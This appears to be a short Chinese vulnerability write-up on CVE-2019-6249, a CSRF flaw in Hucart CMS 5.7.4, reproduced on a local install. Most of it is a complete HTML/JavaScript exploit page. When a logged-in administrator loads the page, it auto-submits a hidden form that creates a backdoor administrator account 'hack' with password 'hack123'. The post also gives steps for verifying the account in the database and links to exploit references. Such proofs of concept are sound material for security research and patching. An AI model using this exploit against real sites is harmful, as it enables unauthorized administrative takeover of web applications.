近日,Hucart cms v5.7.4版本存在一个CSRF漏洞,当管理员登陆后访问CSRF测试页面,可导致增加一个名为hack的管理员账号。漏洞编号是CVE-2019-6249.
从网上下载源码本地安装即可。本地创建一个html文件,保存如下exp代码:
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='admin@hack.com' />";
fields += "<input type='hidden' name='adm_mobile' value='12345678901' />";
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";
fields += "<input type='hidden' name='adm_enabled' value='1' />";
fields += "<input type='hidden' name='act_type' value='add' />";
fields += "<input type='hidden' name='adm_id' value='' />";
var url = "http://localhost/hucart/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
首先以管理员身份登录站点后台,然后访exp代码页面,即可添加一个hack/hack123账户信息,访问即可:
查看数据库后台的hc_admins表能够发现账户信息已经被添加!
源码下载:
http://down.chinaz.com/soft/35067.htm#down
参考信息:
https://www.exploit-db.com/exploits/46149
https://github.com/NMTech0x90/CVE-2019-6249_Hucart-cms